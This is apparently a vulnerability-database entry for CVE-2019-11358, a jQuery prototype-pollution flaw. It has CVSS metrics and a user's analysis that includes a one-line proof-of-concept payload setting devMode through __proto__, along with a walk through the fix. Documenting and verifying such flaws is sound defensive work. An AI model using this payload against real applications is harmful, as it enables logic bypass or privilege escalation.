Attacker Value
Low
(1 user assessed)
Exploitability
Moderate
(1 user assessed)
User Interaction
Required
Privileges Required
None
Attack Vector
Network
3

CVE-2019-11358

Disclosure Date: April 20, 2019
Exploited in the Wild
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Impact
Techniques
Validation
Validated
Validated
Initial Access
Techniques
Validation
Validated

Description

jQuery before 3.4.0, as used in Drupal, Backdrop CMS, and other products, mishandles jQuery.extend(true, {}, …) because of Object.prototype pollution. If an unsanitized source object contained an enumerable proto property, it could extend the native Object.prototype.

Add Assessment

2
Ratings
  • Attacker Value
    Low
  • Exploitability
    Medium
Technical Analysis

I don’t know what kind of expression is officially used, but it is a vulnerability that can change common objects.

When I tried it on the console, it became as follows.

Prepare the variables of test1 and test2, and assign the character string to the test of “proto” of test1.

Then, test2 will also display the character string assigned to test1.

I don’t know what the specifications are, but the same phenomenon occurs when using “proto” for the elements of the array.

If you assign {“admin”: 123456} to test [“__ proto__”], the admin property will be created in test, and only the assigned value will be entered (123456 in this example).

If you assign {“user”: 999999} to test [“user”], the user property will be created in test, and the assigned JSON itself will be entered.

———————————————————————————–+
Impact
Existing properties may be added or modified.

As a result, it can lead to DoS and remote code execution.

Also, changing properties can lead to logic evasion and privilege escalation.


First of all, I downloaded 3.3.1 and 3.4.1 to check the phenomenon.

https://jquery.com/download/

By using the verification code in the following article, we were able to confirm the operation of the vulnerability.

https://snyk.io/blog/after-three-years-of-silence-a-new-jquery-prototype-pollution-vulnerability-emerges-once-again/

let a = $.extend(true, {}, JSON.parse(‘{”proto”: {“devMode”: true}}’))
console.log({}.devMode);
The result of console.log.

3.3.1

true
3.4.1

undefined
Confirmation of correction points
Since I was able to confirm the operation, I decided to confirm the correction points.

As I noticed, verification was added to see if the name was “proto”.

When I tried removing this validation, prototype pollution occurred.

I’m not familiar with javascript, so I can’t understand what I’m doing just by reading the source code.

Let’s actually look at the data handled in the process.

Since I was checking the contents of “name”, let’s see what the name is.

A lot came out.

After a little research, it looks like a jQuery function.

Proto” is also included.

Since name contains “proto”, look for the place where you are using name as an element of the array and assigning it.

Since there were two places, I set console.log.

The results came out messed up so I filtered it.

It was the first place that used “proto”.

I made a pinpoint fix to show devMode and the content was nicely displayed.

CVSS V3 Severity and Metrics
Base Score:
6.1 Medium
Impact Score:
2.7
Exploitability Score:
2.8
Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
Low
Integrity (I):
Low
Availability (A):
None

General Information

Exploited in the Wild

Reported by:

References

Advisory
Miscellaneous

Additional Info

Technical Analysis